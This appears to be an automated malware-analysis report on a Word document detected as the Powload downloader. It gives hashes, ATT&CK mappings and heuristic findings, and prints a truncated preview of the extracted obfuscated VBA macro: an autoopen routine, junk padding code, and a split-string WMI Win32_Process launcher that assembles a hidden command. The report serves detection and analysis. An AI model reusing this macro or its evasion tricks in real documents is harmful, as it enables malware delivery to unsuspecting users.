Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e8c5d544a7c4f929…

MALICIOUS

Office (OLE)

141.8 KB Created: 2019-05-01 12:06:00 Authoring application: Microsoft Office Word First seen: 2020-05-25
MD5: d510bc2f939072e599524eef450b9c8a SHA-1: 6c53772f3f5edd1cc02682e659b322be501eda3a SHA-256: e8c5d544a7c4f929fc3c3422dc0dfd03d2e3ab6ff8e4153f5ea104d35d1b82ce
342 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains a legacy WordBasic auto-exec macro (autoopen) that utilizes GetObject and CreateObject to launch the Win32_Process WMI object. This is a common technique for executing arbitrary code or downloading additional payloads. The obfuscation of 'winmgmts' via string splitting further indicates malicious intent. The ClamAV signature 'Doc.Downloader.Powload-6959614-0' also suggests a downloader family.

Heuristics 9

  • ClamAV: Doc.Downloader.Powload-6959614-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6959614-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19346 bytes
SHA-256: 65bbe7fde41cdd05cb6ae4a50cbafc32907efce147ed2bf62ebf80aad2ff717f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "jAAAQDB"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ZAAAGB"
Attribute VB_Base = "0{3DDDDC9D-4208-4B44-BCC2-0D26DB6E6EB4}{A9893ED2-2232-41DC-B073-FB05396C6987}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "T_wABZAA"

Attribute VB_Name = "z11wAA"

Attribute VB_Name = "fAxAUZo"
Attribute VB_Base = "0{CC4E1B6D-D436-4D55-80D0-02BE203F25B7}{804786E7-034C-4EE9-AE77-7D846E44BC9D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "zwAAAA"
Function K4BADZkk(D_UA4U)
   Select Case vUDUAAZ
Case 686260036
Minute CInt(596086201 _
- Tan(iABAAAxA * Cos(sGoAGx) + _
837434095 + 18311031))
End Select
   Select Case FUwAQZ
Case 818524218
Minute CInt(304697575 _
- Tan(XDAxQDZk * Cos(KAQAZQ) + _
77924935 + 545635818))
End Select
   Select Case BQBBA4A
Case 368511612
Minute CInt(251313143 _
- Tan(kABDGDAG * Cos(iAAZkDo) + _
682615431 + 13884090))
End Select
Set K4BADZkk = CVar(D_UA4U)
   Select Case bA14UU
Case 777470435
Minute CInt(799696668 _
- Tan(pAxAckAA * Cos(w__CZA1) + _
942380692 + 918265459))
End Select
   Select Case ZAkAQA
Case 34303481
Minute CInt(243634515 _
- Tan(c4A_UC * Cos(kAAwAo) + _
173670253 + 194525948))
End Select
   Select Case jAcAQQ
Case 401853815
Minute CInt(180625481 _
- Tan(XDAADQA * Cos(YXUxZUB) + _
652258288 + 914270100))
End Select
End Function
Sub autoopen()
   Select Case VXZkoGA
Case 685600749
Minute CInt(922850440 _
- Tan(KAUoxA * Cos(SDokAAkG) + _
16133227 + 322986075))
End Select
   Select Case j1CAxAQB
Case 148455033
Minute CInt(393957852 _
- Tan(IZBADA * Cos(uwxcGUo1) + _
469160096 + 995695907))
End Select
Call F4wQADwA
   Select Case TAAwoDAA
Case 225087011
Minute CInt(773255202 _
- Tan(BxCBADZ * Cos(JwAAkQxB) + _
564377875 + 640898290))
End Select
   Select Case W_wUXQ
Case 757935989
Minute CInt(70650962 _
- Tan(dCZAx4AD * Cos(wAAGZAD) + _
661643882 + 655102404))
End Select
End Sub


Attribute VB_Name = "cxAQUAD"
Function F4wQADwA()
On Error Resume Next
   Select Case UxA4QAA4
Case 427516016
Minute CInt(522609493 _
- Tan(GDUAZABA * Cos(icAwAX) + _
432231727 + 925551151))
End Select
   Select Case AZCcwU4
Case 160351861
Minute CInt(632253931 _
- Tan(aQAABA * Cos(i1wUAA) + _
946434511 + 998741493))
End Select
Set wADAUDo = K4BADZkk(GetObject("w" + "inmgmts:W" + "in32_Process" + "Sta" + "rtup"))
   Select Case YCZ4AAk
Case 390722416
Minute CInt(614228337 _
- Tan(H4A4A_ * Cos(XUQBkUA) + _
887013691 + 912160111))
End Select
   Select Case DAZDAAD
Case 998248909
Minute CInt(996778684 _
- Tan(PQAA4A * Cos(oAA4Aw1c) + _
885244704 + 581879038))
End Select
sUADUAZZ = vbError - vbError
   Select Case TGZDwk
Case 961799444
Minute CInt(988052721 _
- Tan(kU_A_AAo * Cos(b1UUCA) + _
654263985 + 615303793))
End Select
   Select Case rADAkAA
Case 566922577
Minute CInt(645093004 _
- Tan(AxQ1A_DZ * Cos(EQAZ1A) + _
797680000 + 573767911))
End Select
   Select Case LAoACAw
Case 325010286
Minute CInt(71612631 _
- Tan(YAAAA4k4 * Cos(fAADcBAk) + _
799434165 + 438784297))
End Select
uDACUB = ZAAAGB.ZG4QAcA.PasswordChar + fAxAUZo.sAZACD + ZAAAGB.ZG4QAcA.ControlTipText + fAxAUZo.Uw_AwAC + ZAAAGB.ZG4QAcA + ZAAAGB.ZG4QAcA + fAxAUZo.jDXAAkAA + ZAAAGB.ZG4QAcA.PasswordChar + ZAAAGB.ZG4QAcA.PasswordChar + fAxAUZo.wUC_Ak + ZAAAGB.ZG4QAcA + fAxAUZo.XkUXGck + ZAAAGB.ZG4QAcA.ControlSource
   Select Case XcG4ADoA
Case 178642257
Minute CInt(723332411 _
- Tan(dXAQBZ * Cos(Q_AXABBC) + _
552040408 +
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.